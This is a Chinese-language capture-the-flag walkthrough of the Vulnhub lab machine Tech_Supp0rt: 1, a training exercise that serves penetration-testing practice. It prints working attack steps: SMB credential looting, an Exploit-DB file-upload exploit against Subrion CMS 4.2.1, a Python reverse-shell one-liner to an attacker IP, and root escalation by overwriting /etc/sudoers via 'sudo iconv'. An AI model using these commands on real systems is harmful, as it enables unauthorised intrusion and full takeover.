Vulnhub 靶机篇:Tech_Supp0rt: 1
## 0x01 靶机信息> - **名称**:Tech_Supp0rt: 1
> - **发布日期**:2021 年 6 月 7 日
> - **作者**:Krish Pandey
> - **系列**:Tech_Supp0rt
> - **难度**:简单
> - **简介**:该机器是弹出式诈骗分子设置的服务器,目前正在维护中。
> - **下载链接**:- [https://download.vulnhub.com/techsupp0rt/TechSupport-Clone.vmdk](https://download.vulnhub.com/techsupp0rt/TechSupport-Clone.vmdk
> - **网络**:DHCP自动分配
## 0x02 Write-Up
### 2.1 信息收集
#### 2.1.1 主机扫描
目标机IP:192.168.181.167
使用nmap工具
``` txt
nmap -sS -Pn -p- -A -T4 192.168.181.167
-sS 隐蔽扫描,-Pn 禁Ping,-p- 所有端口,-A 综合扫描,-T4 快速扫描
```
扫描出22,80以及smb服务,在smb服务中扫描出guest用户
!(https://img-oss.hg021b.org/2024/8/d7ad3d471a48a820d5a4893468bd1b92.png)
#### 2.1.2 查看smb服务中的信息
``` bash
smbclient -L 192.168.181.167 -U guest
查看指定IP的共享目录
-L 指定IP,-U 指定用户名
```
使用guest用户空密码登录,发现了一个websvr目录
!(https://img-oss.hg021b.org/2024/8/6d5c194de5fc61fa40b39d0b369de961.png)
使用smbclient登录上smb服务器并连接到websvr目录
``` bash
smbclient //192.168.181.167/websvr -U guest
```
!(https://img-oss.hg021b.org/2024/8/7cd12a0bd9dde87ad6b75a78a1447f2c.png)
发现了一个enter.txt文件,使用mget命令将它下载出来
!(https://img-oss.hg021b.org/2024/8/5d6d1d99b6589cf6ddbf4c8572dc1d32.png)
``` txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk
Wordpress creds
|->
翻译:
目标
=====
1)制作假弹窗并将其在线托管在 Digital Ocean 服务器上
2)修复subrion站点,/subrion不起作用,从面板编辑
3)编辑wordpress网站
注意
===
Subrion 信用
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [用神奇配方烹制]
WordPress 信用
|->
```
文件中反映出有一个登录界面,账户是admin,密码是密文
#### 2.1.3 使用CyberChef解密密码
cooked with magical formula 这一段可以让我们想到著名的CyberChef(网络厨子)
点击魔法棒
!(https://img-oss.hg021b.org/2024/8/306fff01029d0b6f2d2b313ace6142b6.png)
得到密码:Scam2021
!(https://img-oss.hg021b.org/2024/8/dea4fc3200968e1c8226707be82a2cb7.png)
#### 2.1.4 dirsearch目录扫描
接着利用dirsearch目录扫描找出登录面板
``` bash
dirsearch -u http://192.168.181.167/subrion -w /usr/share/dirb/wordlists/common.txt
-u 指定url,-w 指定字典
```
在subrion目录下扫描到了robots.txt文件
!(https://img-oss.hg021b.org/2024/8/3a671ca85ace4a56ddef945b18dd6614.png)
成功找到了控制面板目录/panel
!(https://img-oss.hg021b.org/2024/8/ee58abbeb0f9a4e0ed9ce7da6bd5a1c6.png)
访问http://192.168.181.167/subrion/panel/
在主界面展示了详细版本Subrion CMS v4.2.1
!(https://img-oss.hg021b.org/2024/8/b1dbaa3c90ec5b6be14b739ec2cdd682.png)
### 2.2 渗透路线
#### 2.2.1 在kali中查找漏洞利用
``` bash
searchsploit Subrion CMS 4.2.1
搜索可利用的漏洞
```
找到了一个任意文件上传
!(https://img-oss.hg021b.org/2024/8/1f5218e40334b13f84e65b4166d7ab65.png)
查看脚本内容得知
``` txt
需要的参数
-u 指定路径,-l 指定用户,-p指定密码
```
!(https://img-oss.hg021b.org/2024/8/69f78ab872d88ce32ac597cb0aa54325.png)
#### 2.2.2 执行脚本
``` bash
python3.7 /usr/share/exploitdb/exploits/php/webapps/49876.py-u http://192.168.181.167/subrion/panel/ -l admin -p Scam2021
```
利用成功
!(https://img-oss.hg021b.org/2024/8/296d0d5f30d1b70b08bfb59b36d9d87b.png)
#### 2.2.3 反弹shell
``` txt
nc -lvvp 4444
kali上侦听端口
```
!(https://img-oss.hg021b.org/2024/8/88f5c78f5b99c4778033726d919d8e67.png)
``` python
目标机执行
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.181.136",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```
!(https://img-oss.hg021b.org/2024/8/839027827214198ce0ba391072823159.png)
反弹成功
!(https://img-oss.hg021b.org/2024/8/78b6929241fa0fd0e1cb162864876892.png)
会话升级
``` bash
SHELL=/bin/bash script -q /dev/null
```
!(https://img-oss.hg021b.org/2024/8/27aa8ff7058fc65ba9bb06671de7fb31.png)
查看wordpress的config文件,其中发现了数据库用户support,密码ImAScammerLOL!123!
!(https://img-oss.hg021b.org/2024/8/316d145b623d7f6ff2817a84c3dd00ff.png)
但是扫描结果中并没有发现mysql服务
在home发现用户scamsite
!(https://img-oss.hg021b.org/2024/8/c5e4ad39e2a808fde40107f1470c29bd.png)
#### 2.2.4 利用wordpress配置信息泄露提权
使用密码ImAScammerLOL!123!登录成功
``` bash
ssh scamsite@192.168.181.167
```
!(https://img-oss.hg021b.org/2024/8/80ad1766a7042f57bc6756c0ab01002e.png)
``` bash
sudo -l
查看sudo权限
```
发现可利用的sudo权限iconv
!(https://img-oss.hg021b.org/2024/8/888a56e7bd3fe8ede45b375b527e35cb.png)
这个命令可以任意读写
!(https://img-oss.hg021b.org/2024/8/a1c7e7e5f0d199c73de6539b691f3410.png)
#### 2.2.5 sudo iconv提权
使用命令将/etc/sudoers文件读出来,修改后覆写进去,实现拥有所有sudo权限
``` bash
sudo iconv -f 8859_1 -t 8859_1 "/etc/sudoers" > sudoers.bak
```
!(https://img-oss.hg021b.org/2024/8/308eebc9817551e7c5ce2fe764b38c23.png)
!(https://img-oss.hg021b.org/2024/8/7b21e307d6e80a5b76c5b5c4e6283545.png)
``` bash
cat sudoers.bak |sudo iconv -f 8859_1 -t 8859_1 -o "/etc/sudoers"
```
!(https://img-oss.hg021b.org/2024/8/834b11e04690821172ec3305989f695d.png)
使用sudo su提权成功
!(https://img-oss.hg021b.org/2024/8/51b2b181c2bc38570848cead517e153c.png)
页:
[1]